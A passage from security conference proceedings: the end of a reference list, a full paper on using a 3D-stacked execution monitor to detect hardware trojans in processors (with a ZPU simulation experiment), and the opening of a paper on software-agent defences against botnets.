http://www.nursingtimes.net/whats-new-in-nursing/acute-care/loss-of-patient-details-prompts-warning-forfive-trusts/5004422.article<br />
[Accessed: 01 June 2010].<br />
Office of Public Sector Information, (2010). Access to Medical Reports Act 1988 (1988 CHAPTER 28), [online].<br />
Available from: http://www.opsi.gov.uk/acts/acts1988/Ukpga_19880028_en_1.htm [Accessed: 01 June<br />
2010].<br />
Park, J. and Sandhu, R., (2002). Towards usage control models: beyond traditional access control. In: the<br />
seventh ACM symposium on Access control models and technologies, SACMAT '02. Monterey, California,<br />
USA: ACM. pp. 57-64.<br />
286
Shada Alsalamah et al.<br />
Pirnejad, H., (2008). Communication in Healthcare: Opportunities for information technology and concerns for<br />
patient safety. Thesis. Erasmus University. Rotterdam. pp. 164.<br />
Røstad, L. and Alsos, O. A., (2009). Patient-Administered Access Control: A Usability Study. In: International<br />
<strong>Conference</strong> on Availability, Reliability and Security 2009. ARES '09. IEEE Computer Society. pp. 877- 881.<br />
Skilton, A. et al., (2009). Role Based Access in a Unified Electronic Patient Record. In: The 14th International<br />
Symposium on Health Information Management Research. Bath P, Petersson G, AND Steinschaden T<br />
editors. Kalmar, Sweden. pp. 217- 222.<br />
Smith, E. and Eloff, J. H. P., (1999). Security in Health-care information systems - current trends. International<br />
Journal of Medical Informatics, 54, (1) pp. 39-54.<br />
Sturcke, J. and Campbell, D., (2010). NHS database raises privacy fears, say doctors, [online]. Available from:<br />
http://www.guardian.co.uk/society/2010/mar/07/nhs-database-doctors-warning?CMP=twt_gu [Accessed: 12<br />
November 2010].<br />
Thompson, M. R., Essiari, A. and Mudumbai, S., (2003). Certificate-based authorization policy in a PKI<br />
environment. ACM Trans. Inf. Syst. Secur., 6, (4) pp. 566-588.<br />
Wasson, G. and Humphrey, M., (2003). Policy and Enforcement in Virtual Organizations. In: The fourth<br />
International Workshop on Grid Computing, IEEE/ACM IEEE Computer Society. pp.125.<br />
Yau, S. S. and Chen, Z., (2008). Security Policy Integration and Conflict Reconciliation for Collaborations among<br />
Organizations in Ubiquitous Computing Environments. In: Ubiquitous Intelligence and Computing, UIC.<br />
Springer Berlin/ Heidelberg. pp. 3- 19.<br />
Zander, K., (2002). Integrated Care Pathway: eleven international trends. Journal of Integrated Care Pathways,<br />
6, pp. 101-107.<br />
287
3D Execution Monitor (3D-EM): Using 3D Circuits to Detect<br />
Hardware Malicious Inclusions in General Purpose<br />
Processors<br />
Michael Bilzor<br />
U.S. Naval Postgraduate School, Monterey, California, USA<br />
mbilzor@nps.edu<br />
Abstract: Hardware malicious inclusions (MIs), or "hardware trojans," are malicious artifacts planted in<br />
microprocessors. They present an increasing threat to computer systems due to vulnerabilities at several stages<br />
in the processor manufacturing and acquisition chain. Existing testing techniques, such as side-channel analysis<br />
and test-pattern generation, are limited in their ability to detect malicious inclusions. These hardware attacks can<br />
allow an adversary to gain total control over a system, and are therefore of particular concern to high-assurance<br />
customers like the U.S. Department of Defense. In this paper, we describe how three-dimensional (3D) multilayer<br />
processor fabrication techniques can be used to enhance the security of a target processor by providing<br />
secure off-chip services, monitoring the execution of the target processor's instruction set, and disabling<br />
potentially subverted control circuits in the target processor. We propose a novel method by which some<br />
malicious inclusions, including those not detectable by existing means, may be detected and potentially mitigated<br />
in the lab and in fielded, real-time operation. Specifically, a target general-purpose processor, in one layer, is<br />
joined using 3D interconnects to a separate layer, which contains an Execution monitor for detecting deviations<br />
from the target processor's specified behavior. The Execution monitor layer is designed and fabricated separately<br />
from the target processor, using a trusted process, whereas the target processor may be fabricated by an<br />
untrusted source. For high-assurance applications, the monitor layer may be joined to the target layer, after each<br />
has been separately fabricated. In the context of existing computer security theory, we discuss the limits of what<br />
an Execution monitor can do, and describe how one might be constructed for a processor. Specifically, we<br />
propose that the signals which carry out the target processor's instruction set actions may be described in a<br />
stateful representation, which serves as the input for a finite automata-based Execution monitor, whose<br />
acceptance predicate indicates when the target processor's behavior violates its specification. We postulate a<br />
connection between Execution monitor theory and the proposed 3D processor monitoring system, which can be<br />
used to detect a specific class of malicious inclusions. Finally, we present the results of our first monitor<br />
experiment, in which we designed and tested (in simulation) a simple Execution monitor for a small open-source<br />
32-bit processor design known as the ZPU. We analyzed the ZPU processor to determine which signals must be<br />
monitored, designed a system of monitor interconnects in the hardware description language (HDL)<br />
representation, developed a stateful representation of the microarchitectural behavior of the ZPU, and designed<br />
an Execution monitor for it. We demonstrated that the Execution monitor identifies correct operation of the<br />
original, unmodified ZPU, as it executed arbitrary code. Having introduced some minor deviations to the ZPU<br />
processor's microarchitectural design, we then showed in simulation that the Execution monitor correctly<br />
detected the deviations, in the same way that it might detect the presence of some malicious inclusions in a<br />
modern processor.<br />
Keywords: processor, security, trojan, subversion, detection<br />
1. The threat to microprocessors<br />
Today's Defense Department relies on advanced microprocessors for its high-assurance needs.<br />
Those applications include everything from advanced weaponry, fighter jets, ships, and tanks, to<br />
satellites and desktop computers for classified systems. Much attention and resources have been<br />
devoted to securing the software that runs these devices and the networks on which they<br />
communicate. However, two significant trends make it increasingly important that we also focus on<br />
securing the underlying hardware that runs these high-assurance devices. The first is the U.S.'<br />
greater reliance on processors produced overseas. The second is the increasing ease with which<br />
hardware may be maliciously modified and introduced into the supply chain.<br />
Every year, more microprocessors destined for U.S. Department of Defense (DoD) systems are<br />
manufactured overseas, and fewer are made inside the U.S. As a result, there is a greater risk of<br />
processors being manufactured with malicious inclusions (MIs), which could compromise highassurance<br />
systems. This concern was highlighted in a 2005 report by the Defense Science Board,<br />
which noted a continued exodus of high-technology fabrication facilities from the U.S. (Defense<br />
Science Board 2005). Since this report, "more U.S. companies have shifted production overseas,<br />
have sold or licensed high-end capabilities to foreign entities, or have exited the business."<br />
(McCormack 2008) One of the Defense Science Board report's key findings reads, "There is no longer<br />
288
Michael Bilzor<br />
a diverse base of U.S. integrated circuit fabricators capable of meeting trusted and classified chip<br />
needs." (Defense Science Board 2005)<br />
Today, most semiconductor design still occurs in the U.S., but some design centers have recently<br />
developed in Taiwan and China (Yinung 2009). In addition, major U.S. corporations are moving more<br />
of their front-line fabrication operations overseas for economic reasons:<br />
"Press reports indicate that Intel received up to $1 billion in incentives from the Chinese<br />
government to build its new front-end fab in Dalian, which is scheduled to begin production in<br />
2010." (Nystedt 2007)<br />
"Cisco Systems has pronounced that it is a 'Chinese company,' and that virtually all of its products<br />
are produced under contract in factories overseas." (McCormack 2008)<br />
"Raising even greater alarm in the defense electronics community was the announcement by IBM<br />
to transfer its 45-nanometer bulk process integrated circuit technology to Semiconductor<br />
Manufacturing International Corp., which is headquartered in Shanghai, China. There is a concern<br />
within the defense community that it is IBM's first step to becoming a 'fab-less' semiconductor<br />
company." (McCormack 2008)<br />
Since modern processors are designed in software, the processor design plans become a potential<br />
target of attack. Malicious logic can also be inserted after a chip has been manufactured, such as with<br />
focused ion beam milling (Adee 2009).<br />
Though reports of actual malicious inclusions are often classified or kept quiet for other reasons,<br />
some reports do surface, like this unverified account (Adee 2009):<br />
According to a U.S. defense contractor who spoke on condition of anonymity, a<br />
'<strong>European</strong> chip maker' recently built into its microprocessors a "kill switch" that could be<br />
accessed remotely. French defense contractors have used the chips in military<br />
equipment, the contractor told IEEE Spectrum. If in the future the equipment fell into<br />
hostile hands, 'the French wanted a way to disable that circuit,' he said.<br />
According to the New York Times, such a "kill switch" may have been used during the 2007 Israeli<br />
raid on a suspected Syrian nuclear facility under construction (Markoff 2009).<br />
2. Characterizing processor malicious inclusions<br />
Several academic research efforts have demonstrated the insertion of MIs into general-purpose<br />
processor designs. In one example, King, et al., show how a very small change in the design of a<br />
processor facilitates "escalation-of-privilege" and "shadow mode" attacks, each of which can allow an<br />
adversary to gain arbitrary control over the targeted system (King 2009). In another example, Jin, et<br />
al., show how small, hard-to-detect MIs can allow an adversary to gain access to a secret encryption<br />
key (Jin 2009). Researchers have created various taxonomies of MIs, based on their characteristics.<br />
One example comes from Tehranipoor and Koushanfar (Tehranipoor 2010), from which the following<br />
simplified diagram (Figure 1) is derived:<br />
The components of a simple general-purpose processor are generally classifiable according to their<br />
function. For example, a circuit in a microprocessor may participate in control-flow execution<br />
(participate in fetch-decode-execute-retire), be part of a data path (like a bus), execute storage and<br />
retrieval (like a cache controller), assist with control, test and debug (as in a debug circuit), or perform<br />
arithmetic and logic computation (like an arithmetic-logic circuit, or ALU). This list may not be<br />
exhaustive, and some circuits' functions may overlap, but broadly speaking we can subdivide the<br />
component circuits in a processor using these classifications.<br />
The main focus of our research is the detection of malicious inclusions which target the first category,<br />
control flow circuits. In considering processor malicious inclusions, it is worth noting that in some<br />
cases a detection strategy is warranted, and in others a mitigation strategy may be preferable. Table<br />
1 lists each of the circuit functional types mentioned above, and pairs it with a potential 3D detection<br />
and/or mitigation strategy.<br />
289
Michael Bilzor<br />
Figure 1: A taxonomy of malicious inclusions, modified slightly from (Tehranipoor 2010)<br />
Table 1: Processor circuit type, with some associated MI mitigation and detection techniques<br />
Circuit Type Detection/Mitigation Technique<br />
Control Flow Control Flow Execution Monitor<br />
(subject of our experiments)<br />
Chip Control, Test, and Debug Keep-Alive Protections<br />
Data Paths Datapath Integrity Verification<br />
Memory Storage and Retrieval Load/Store Verification<br />
Arithmetic and Logic Computation Arithmetic/Logic Verification<br />
In Figure 2, we update the malicious inclusion taxonomy from Figure 1, and associate each MI action<br />
type with a matching detection or mitigation technique:<br />
Figure 2: Malicious inclusion taxonomy, with associated mitigation and detection methods<br />
290
Michael Bilzor<br />
In our current experiments, we intend to demonstrate an implementation of the execution monitor,<br />
which governs the operation of the instruction set of a general-purpose processor, and should detect<br />
MIs from the fourth action category, "Modify Functionality." MIs from this category might, for example,<br />
be designed to allow an adversary to leak secret information or to gain privileged access in system.<br />
3. Limits of existing processor tests<br />
General-purpose processor designs go through verification testing before fabrication begins. Designphase<br />
verification usually involves construction of a verification environment using tools like<br />
SystemVerilog and the Open Verification Methodology (OVM) (Iman 2008). There are several<br />
shortfalls with verifying processor designs, with respect to malicious inclusions:<br />
Not all processor designs, or portions of designs, undergo formal verification. Processor designs<br />
also may incorporate reused sub-components, as well as unverified open-source or third-party<br />
components.<br />
Processor design verification tends to ensure that the processor correctly executes its intended<br />
functions, but usually is not designed to verify the absence of additional, possibly malicious<br />
functionality, such as an MI.<br />
Processor design verification usually cannot be exhaustive, due to the exponential number of<br />
possible internal configurations of a processor. Modern functional verification often focuses on<br />
generating a sufficient number of random test cases to be reasonably confident of a design's<br />
correctness; as a result, rare-event malicious triggers may not be detected.<br />
Once a processor has been fabricated, some sample dies may be examined, destructively or<br />
nondestructively, for the presence of MIs. Using destructive methods, a processor's top layers may be<br />
removed and its metal layers examined for anomalies, using specialized imagers. Since processors<br />
cannot be used operationally after destructive testing, it is limited to a small sample set, and not a<br />
complete solution.<br />
Non-destructive processor tests include various power and timing "fingerprinting" techniques.<br />
Essentially, using sensitive measuring equipment, a tester can drive a processor's inputs with test<br />
patterns and measure current and timing delays at the outputs. The results from the device under test<br />
are statistically compared with the results from presumed-good, or "golden," sample processors. The<br />
principal limitations of nondestructive fingerprint-based testing include: (Agrawal 2007, Jin 2008, Jin<br />
2009, Rad 2008)<br />
Such tests rely on the existence of a presumed-good "golden" sample. Therefore, if the<br />
subversion occurred in the design phase, and hence was cast into all the fabricated processors,<br />
the subversion will not be detected through these comparisons.<br />
Very small MIs, involving fewer than around .1% of the transistors on a die, are generally not<br />
detectable using these techniques, and it is not very difficult for an attacker to design a subversion<br />
which remains below this threshold.<br />
4. 3D fabrication and potential security applications<br />
Because feature sizes are shrinking very near to their theoretical limits, processor manufacturers are<br />
constrained in improving performance through the use of traditional methods on a single-layer design.<br />
As a result, manufacturers and designers have been rapidly advancing the technologies needed to<br />
make "3D" processors. In a 3D processor design, two or more silicon layers are joined together face<br />
to face or face to back, using a variety of interconnection methods. As a result, off-chip resources, like<br />
extra cache memory or another processor, which might normally be elsewhere on the printed circuit<br />
board, are physically much closer to the primary processing layer, resulting in shorter communication<br />
delays, and hence better performance (Mysore 2006). Though the development of 3D interconnect<br />
technology has been driven by performance, several security-relevant applications have also been<br />
suggested (Valamehr 2010):<br />
3D security services, such as those that might be found in a security coprocessor, could be made<br />
available to the primary processor layer.<br />
A 3D layer acting as a "control plane" could monitor and restrict the behavior of a target processor<br />
in the "computation plane." For example, the control plane processor could facilitate the<br />
segregation of multi-level data by partitioning the cache lines inside the target.<br />
291
Michael Bilzor<br />
Another potential security-relevant application of 3D is the Execution monitor, or 3D-EM. With a 3D-<br />
EM, key control signals of the target processor, or computation plane, are monitored, through 3D<br />
interconnects, by another processor in the control plane. The EM's sole purpose is to monitor the<br />
execution of the target processor, and identify when the sequences of observed signal values deviate<br />
from those sequences allowed by the target processor's design. Design and construction of a 3D-EM<br />
alongside a target processor could occur as follows:<br />
The target processor's architectural design is developed and translated into hardware design<br />
language (HDL).<br />
From the design documents and HDL specification, the processor's design undergoes normal<br />
functional verification (e.g., formal methods, OVM, simulation, FPGA test), to determine:<br />
Correctness of the expected functionality (as normal).<br />
Absence of any malicious additional functionality (additional steps for MI detection).<br />
Once the target's HDL design is finalized, the target's execution control signals (those which must<br />
be monitored) are identified. An HDL version of the monitor is constructed. One of our research<br />
goals is to develop a "recipe" for these two steps.<br />
During floorplanning (including power, area, and heat optimizations) of the target, the appropriate<br />
3D monitoring interconnects are physically laid out, from the target layer to the monitor layer.<br />
The target's final floorplanned design is transferred to a set of fabrication masks and sent to the<br />
foundry for production. The target processors may be fabricated at either a trusted or an untrusted<br />
foundry.<br />
Target processors which are not destined for high-assurance applications are finished and<br />
assembled onto printed circuit boards.<br />
Target processors which are destined for monitored, high-assurance applications are shipped for<br />
further assembly.<br />
The monitors are fabricated at a trusted facility.<br />
The target processors and monitors are then joined, assembled onto printed circuit boards, and<br />
tested again.<br />
Adding the extra steps to co-design a monitor will slow the overall development process; one goal of<br />
our research is to find ways to automate or semi-automate the monitor co-design portion. The target<br />
processors could still be produced in large volume for non-high-assurance customers, where<br />
monitoring is not required, in order to keep their unit cost down. Only the high-assurance customers<br />
need to go through the extra steps of designing, fabricating, and joining the monitor layer. The monitor<br />
layer might be placed above or below the target layer. One possible arrangement is shown in Figure<br />
3:<br />
Figure 3: A possible 3D arrangement of the monitor and target layers, adapted from (Puttaswamy<br />
2006)<br />
292
5. Execution monitor theory<br />
Michael Bilzor<br />
Several of the important characteristics of an EM were described by Schneider (Schneider 2000). A<br />
brief summary of some of the conclusions is listed below (see source for formal definitions of safety<br />
property and security automata).<br />
The target's execution is characterized by (finite or infinite) sequences, where Ψ denotes a<br />
universe of all possible sequences, and a target S defines a subset ΣS of Ψ corresponding to the<br />
executions of S. The sequences may be comprised of atomic actions, events, or system states,<br />
for example.<br />
A security policy is specified by giving a predicate on sets of executions. A target S satisfies<br />
security policy P if an only if P(ΣS) equals true.<br />
If the set of executions for a security policy P is not a safety property, then an enforcement<br />
mechanism from an EM does not exist for P.<br />
EM-enforceable security policies are composable: when multiple EMs are used in tandem, the<br />
policy enforced by the aggregate is the conjunction of the policies enforced by each in isolation.<br />
A security automata can serve as the basis for an enforcement mechanism in EM.<br />
Consider a set of signals A which are dependent on the value of an instruction opcode in a processor.<br />
We assume that, within the set A, all the signals change values synchronously, as they would in a<br />
common clock domain. The possible values of a single member a ∈ A may be described by a set of<br />
finite, discrete values V (e.g., logic low, logic high, high impedance, etc.). These physical values are<br />
represented discretely in an HDL description, as well. For example, a VHDL "standard logic" signal is<br />
nine-valued: V = {U, X, 0, 1, Z, W, L, H, -}. If set A contains n signals, we can denote them a1, a2, ...<br />
an. For a target processor S, containing the signals of A (and others), the state of A at time t may be<br />
denoted At, and the execution trace of the signals in A of processor S may be described as an<br />
ordered set of states ΣS = {A0, A1, ... }. Here, Ψ represents the universe of all possible execution<br />
traces.<br />
We hypothesize that, in terms of instruction set execution:<br />
The signals comprising A may be systematically identified,<br />
The permitted and prohibited sequences of signal states, defining P(ΣS) = True and P(ΣS) = False,<br />
may be inferred from the processor's specification and HDL definition, and<br />
A 3D-EM developed using our construction meets the criteria of a security automata, enforcing a<br />
safety property.<br />
One goal of our research is to demonstrate that a 3D processor Execution monitor can be developed<br />
which satisfies the conditions of (Schneider 2000) and is able to detect a certain class of MI -<br />
specifically, an MI which causes the processor's instruction-control signals, comprising the<br />
microarchitectural state of the machine, to deviate from their allowable control flow.<br />
6. Experimental evaluation<br />
The ZPU is a simple general-purpose, open-source processor, whose VHDL design we obtained from<br />
OpenCores.org (OpenCores 2010). The ZPU uses 32-bit operands and a subset of the MIPS<br />
instruction set. It has a stack-based architecture, without an accumulator, and no internal processor<br />
registers. It is an unpipelined, single-core design, supporting interrupts, but with no privilege rings or<br />
other complex features. It is intended primarily for system-on-chip implementations in FPGAs.<br />
The top level design of the ZPU (Figure 4) contains a processor core, a timer, a CPU-to-memory I/O<br />
unit, and a DRAM (memory) unit:<br />
We created and added a monitor entity for the processor core. The units communicated as below, in<br />
Figure 5:<br />
From the VHDL design of the ZPU core, we manually identified the control-type signals, i.e., the<br />
signals directly carrying out the instruction-set execution. Some examples of these include<br />
memory_read_enable and memory_write_enable, an interrupt signal, an operand_immediate signal,<br />
etc. The ZPU VHDL design explicitly characterizes the internal state of the processor with named<br />
293
Michael Bilzor<br />
states, from which we constructed a full finite state machine (of control signal states) and identified all<br />
the legal state-to-state transitions. Some of the ZPU's internal states and are shown in Figure 6.<br />
Figure 4: Processor and system configuration without execution monitor<br />
Figure 5: Processor and system configuration with execution monitor added<br />
Figure 6: Some of the ZPU processor internal control states<br />
The ZPU monitor accesses the identified control signals through VHDL "ports". In a physical 3D<br />
design, these signals would transit from the target layer to the monitor layer by through-silicon vias<br />
(TSVs) or some other 3D joining method. This mapping might occur at the 3D floorplanning stage,<br />
before the netlist files have been synthesized into mask database files for each layer. Since this ZPU<br />
294
Michael Bilzor<br />
design was run in simulation but not physically synthesized, the physical 3D translation is notional.<br />
However, the circuit delay (one full clock cycle) for interlayer signal transmission and the number of<br />
3D posts - approximately 50, in this case - are reasonable, given the current state of 3D interconnect<br />
design (Mysore 2006).<br />
The monitoring logic actually makes two checks. The first check consults a lookup table that contains<br />
the state transition logic. For example, if the monitor detects that the ZPU went from state A to state<br />
B, and that the signal set was S at the completion of the clock cycle when it was in state A, the<br />
monitor looks to see if a matching legal transition exists in the table. The construction of the table is<br />
such that each transition must be unique; the processor can't choose nondeterministically among<br />
several available choices. If the monitor detects that no legal transition from state A with signal set S<br />
to state B existed, then it sets the output "predicate" to false to flag a violation.<br />
The second check verifies that any changes to the signal set S, in state A, to the new signal set S', in<br />
state B, were legal, according to the transition table. Using the transition that was selected in the<br />
previous step, the monitor evaluates each signal in S' to see if it violated any of the post-conditions of<br />
the transition. If not, it again signals the appropriate predicate to false.<br />
The monitor was evaluated using Mentor Graphics' Model Sim tool. In the first test, the unmodified<br />
ZPU processor executes code with the monitor observing. The ZPU software program used for these<br />
particular tests included a broad mix of all of the ZPU instruction set opcodes. In the first test, the<br />
execution of the unmodified ZPU did not cause the monitor to flag any transitions or signal<br />
modifications as illegal. Next, we made small modifications to the ZPU core, then recompiled the<br />
design and ran the simulation again.<br />
Some of the small deviations we introduced in the ZPU processor design included:<br />
When visiting the internal "No-op" state, the ZPU increments a counter which ticks up to 5 "No-op"<br />
instructions, then on the next one sets the "inInterrupt" signal to 1, causing a violation to be<br />
observed by the monitor.<br />
In another modification, the ZPU tries to go straight from the internal "No-op" state to the "Resync"<br />
state (which is not allowed by the design specification), and again a violation is observed by the<br />
monitor.<br />
The HDL code for these example deviations is below:<br />
when State_Nop =><br />
begin_inst
Michael Bilzor<br />
Figure 7: The processor executed normally, and no anomalies were detected<br />
Figure 8: The first processor anomaly was active, and was detected by the monitor<br />
Figure 9: The second processor anomaly was active, and was detected by the monitor<br />
The monitor's transition table had 112 records in it, to cover the 112 allowable transitions among the<br />
23 unique internal processor states. These are reasonably small numbers to implement in a monitor,<br />
but we are also interested in the growth of the size of the monitor, as the target processor becomes<br />
more complex.<br />
Recall from Section 5 that a standard circuit's voltage, as described in VHDL, can represent one of 9<br />
discrete values. For n circuits, then, we would expect 9 n possible signal permutations - an<br />
impractically large number, if the state machine must have 9 n states, one for each permutation. We<br />
will explore in future research whether the actual number of required signal permutations, and hence<br />
monitor states, is typically much smaller, as was the case in this example.<br />
We synthesized the design, using a Virtex-5 FPGA target, in two different configurations - the<br />
processor architecture alone, and the processor architecture with the monitor. In both cases, the<br />
maximum design speed was 228Mhz, indicating that adding the monitor did not impose a speed<br />
performance limit on the processor.<br />
8. Conclusions<br />
The following are some of the limitations of this research:<br />
The techniques illustrated are focused on only one of the categories of malicious inclusion from<br />
the taxonomy described earlier; detection and mitigation techniques should be developed for the<br />
other types as well, and this is an open research area.<br />
The Execution monitor's performance must not limit the performance of the target processor<br />
which it monitors. For example, the maximum clock speed of the EM should be at least as fast as<br />
the maximum intended clock speed of the target processor. The power, area, and heat<br />
requirements of the monitor should not exceed the practical limits of the overall 3D design. Also,<br />
the clock-cycle latency between MI activation and detection should be small enough to permit<br />
effective correction. We plan to evaluate 3D-EM designs further, using these performance<br />
measures, in the future.<br />
From our preliminary work on the ZPU 3D-EM design, we reached the following conclusions:<br />
Designing and simulating the operation of a basic 3D monitor for a simple processor design is<br />
feasible. However, the physical design space for 3D monitors needs further exploration, and<br />
monitors for more complex processors should be developed.<br />
As expected, simple deviations from the processor's specified instruction-control behavior can be<br />
detected at runtime.<br />
The 3D Execution monitor is the first hardware-based approach with the potential for identifying<br />
processor MIs both during testing and during real-time, fielded operation - an important advantage<br />
296
Michael Bilzor<br />
over testbench methods, since delayed triggers may cause an MI to be inactive during<br />
predeployment testing.<br />
9. Future work<br />
For this demonstration, we selected the control signals and developed the stateful representation<br />
manually. In future experiments, we hope to work on methods whereby the microarchitectural control<br />
signals can be automatically identified, and the monitor constructed automatically or semiautomatically<br />
(or identify any reasons why the process cannot be automated). We would like to design<br />
a monitor for a register-based processor with one or more data buses, in order to compare it with<br />
monitoring a stack-based processor like the ZPU. We would also like to design processor anomalies<br />
which accomplish some more meaningful subversions. Finally, we wish to test whether the monitor<br />
can detect unknown MIs, designed by third parties unfamiliar with the monitor construction.<br />
It would be useful to scale up the 3D Execution monitor experiments to more complex processor<br />
designs, with modern features like pipelined and speculative execution, multithreading, vector<br />
operations, virtualization support, and multi-core.<br />
Acknowledgements<br />
This research was funded in part by National Science Foundation Grant CNS-0910734.<br />
References<br />
Adee, S., (2008) "The Hunt for the Kill Switch", [online] IEEE Spectrum, May 2008,<br />
http://spectrum.ieee.org/semiconductors/design/the-hunt-for-the-kill-switch<br />
Agrawal, D., Baktir, S., Karakoyunlu, D., Rohatgi, P., and Sunar, B. (2007) "Trojan Detection Using IC<br />
Fingerprinting", 2007 IEEE Symposium on Security and Privacy.<br />
Defense Science Board (2005). Report of the 2005 Defense Science Board Task Force on High Performance<br />
Microchip Supply, Office of the Undersecretary of Defense for Acquisition, Technology, and Logistics.<br />
Iman, S. (2008) Step-by-Step Functional Verification with SystemVerilog and OVM, Hansen Brown Publishing,<br />
San Francisco.<br />
Jin, Y. and Makris, Y. (2008) "Hardware Trojan Detection Using Path Delay Fingerprint", Proceedings of the 2008<br />
IEEE International Workshop on Hardware-Oriented Security and Trust.<br />
Jin, Y., Kupp, N., and Makris, Y. (2009) "Experiences in Hardware Trojan Design and Implementation",<br />
Proceedings of the IEEE International Workshop on Hardware-Oriented Security and Trust.<br />
King, S., Tucek, J., Cozzie, A., Grier, C. Jiang, W., and Zhou, Y. (2009) "Designing and Implementing Malicious<br />
Hardware", Proceedings of the IEEE International Workshop on Hardware Oriented Security and Trust.<br />
Markoff, J. (2009) "Old Trick Threatens Newest Weapons", [online], New York Times, 27 October.<br />
http://www.nytimes.com/2009/10/27/science/27trojan.html?_r=2.<br />
McCormack, Richard (2008) "DoD Broadens 'Trusted' Foundry Program to Include Microelectronics Supply<br />
Chain", Manufacturing & Technology News, Thursday, 28 February.<br />
Mysore, S., Agrawal, B., Srivastava, N., Lin, S., Banerjee, K., and Sherwood, T. (2006) "Introspective 3D Chips",<br />
2006 International <strong>Conference</strong> on Architectural Support for Programming Languages and Operating<br />
Systems.<br />
Nystedt, D. (2007) "Intel Got its New China Fab for a Bargain, Analyst Says", [online] CIO.com,<br />
http://www.cio.com/article/101450/Intel_Got_Its_New_China_Fab_for_a_Bargain_Analyst_Says<br />
OpenCores.org (2010), [online] http://opencores.org.<br />
Pellerin, D., and Taylor, D. (1997) VHDL Made Easy, Prentice Hall, Upper Saddle River, NJ.<br />
Puttaswany, K., and Loh, G., (2006) "Implementing Register Files for High-Performance Microprocessors in a<br />
Die-Stacked (3D) Technology", Proceedings of the 2006 Emerging VLSI Technologies and Architectures,<br />
Vol. 00, March.<br />
Rad, R., Plusquellic, J., and Tehranipoor, M. (2008) "Sensitivity Analysis to Hardware Trojans Using Power<br />
Supply Transient Signals", 2008 IEEE International Workshop on Hardware Oriented Security and Trust.<br />
Schneider, F. (2000) "Enforceable Security Policies", ACM Transactions on Information and System Security,<br />
Vol. 3, No. 1, February, pp 30-50.<br />
Tehranipoor, M. and Koushanfar, F. (2010) "A Survey of Hardware Trojan Taxonomy and Detection", IEEE<br />
Design and Test of Computers, vol. 27, issue 1, January/February, pp10-24.<br />
Valamehr, J., Tiwari, M., Sherwood, T., Kastner, R., Huffmire, T., Irvine, C., and Levin, T., (2010) Hardware<br />
Assistance for Trustworthy Systems through 3-D Integration, Proceedings of the 2010 Annual Computer<br />
Security Applications <strong>Conference</strong> (ACSAC), Austin, TX, December.<br />
Yinung, F. (2009) "Challenges to Foreign Investment in High-Tech Semiconductor Production in China", United<br />
States International Trade Commission, Journal of International Commerce and Economics, May.<br />
297
Towards an Intelligent Software Agent System as Defense<br />
Against Botnets<br />
Evan Dembskey and Elmarie Biermann<br />
UNISA, Pretoria, South Africa<br />
French South African Institute of Technology CPUT, Cape Town, South Africa<br />
Dembsej@unisa.ac.za<br />
bierman@xsinet.co.za<br />
Abstract: Computer networks are targeted by state and non-state actors and criminals. With the<br />
professionalization and commoditization of malware we are moving into a new realm where off-the-shelf and<br />
time-sharing malware can be bought or rented by the technically unsophisticated. The commoditization of<br />
malware comes with all the benefits of mass produced software, including regular software updates, access to<br />
fresh exploits and the use of hack farms. To an extent defense is out of the hands of the government, and in the<br />
hands of commercial and private hands. However, the cumulative effect of Information Warfare attacks goes<br />
beyond the commercial and private spheres and affects the entire state. Thus the responsibility for defense<br />
should be distributed amongst all actors within a state. As malware increases and becomes more sophisticated<br />
and innovative in their attack vectors, command & control structures and operation, more sophisticated,<br />
innovative and collaborative methods are required to combat them. The current scenario of partial protection due<br />
to resource constraints is inadequate. It is thus necessary to create defence systems that are robust and resilient<br />
against known vectors and vectors that have not previously been used in a manner that is easy and cheap to<br />
implement across government, commercial and private networks without compromising security. We argue that a<br />
significant portion of daily network defence must be allocated to software agents acting in a beneficent botnet<br />
with distributed input from human actors, and propose a framework for this purpose. This paper is based the<br />
preliminary work of a PhD thesis on the topic of using software agents to combat botnets, and covers the<br />
preliminary literature survey and design of the solution. This includes a crowd sourcing component that uses<br />
information about malware gained from software agents and from human users. Part of this work is based on<br />
previous research by the authors. It is anticipated that the research will result in a clearer understanding of the<br />
role of software agents in the role of defence against computer network operations, and a proof-of-concept<br />
implementation.<br />
Keywords: information warfare, Botnet, software agent<br />
1. Introduction<br />
We propose to use distributed software agents (SA) as a method for overcoming botnets and other<br />
malware in the area of Information Warfare (IW). This area of research is important due to the growing<br />
threat posed by malware. This research addresses some of the long term research goals identified by<br />
the US National Research Council (National Research Council (U.S.). Committee on the Role of<br />
Information Technology in Responding to Terrorism et al. 2003) and four of the ten suggested<br />
research areas in (Denning, Denning 2010). It is an extension and refinement of research undertaken<br />
to determine if an IW SA agent framework is viable (Dembskey, Biermann 2008).<br />
Malware is a reality of networked computers and is being increasingly used by state, criminal and<br />
terrorist actors as weapons, vectors for crime and tools of coercion. While it is debatable whether a<br />
digital Pearl Harbour is a genuine possibility (Smith 1998), it is agreed that malware is on the increase<br />
and is being commoditized (Knapp, Boulton 2008, Microsoft 2010, Dunham, Melnick 2009), though<br />
there is some dissent on this point (Prince 2010). Technically unsophisticated users can purchase<br />
time on existing botnets to accomplish some goal, e.g. phishing attacks, spamming, or the denial,<br />
destruction or modification of data.<br />
A botnet is a distributed group of software agent-like bots that run autonomously and automatically,<br />
usually without the knowledge of the computers owner. Botnets are usually, but not necessarily,<br />
malicious. The purpose of botnets is not necessarily destructive; it is often financial gain, which results<br />
in a very different approach to development and Command & Control. An effective process of<br />
prevention, detection and removal will mitigate botnets regardless of their purpose.<br />
IW is warfare that explicitly recognises information as an asset. Computer Network Operations (CNO)<br />
is a form of IW that uses global computer networks to further the aims of warfare. CNO is divided into<br />
Computer Network Attack (CNA) and Computer Network Defence (CND). Increasingly, politically<br />
motivated cyber attacks are focusing on commercial and not government infrastructure (Knapp,<br />
298
Evan Dembskey and Elmarie Biermann<br />
Boulton 2008). Also, money from online scams may be used to fund terrorist and further criminal<br />
activity. SA are a form of software that have the properties of intelligence, autonomy and mobility. We<br />
define SA as programs that autonomously and intelligently acquire, manipulate, distribute and<br />
maintain information on behalf of a user or another software agent.<br />
Intrusion prevention is the Holy Grail of security. This goal is currently unobtainable; there will be<br />
intrusions. The literature shows that traditional defences such as firewalls, antivirus and intrusion<br />
prevention are not effective against botnets (Ollmann 2010). Some researchers believe that antimalware<br />
software is less effective than in the past (Oram, Viega 2009). Researchers at Microsoft<br />
(Microsoft 2010) assert that malware activity increased 8.9% from first to second half of 2009. This is<br />
probably an overly conservative figure. Some researchers estimate that botnet infections are up to<br />
4000% higher than reported (Dunham, Melnick 2009). One major problem in prevention is that social<br />
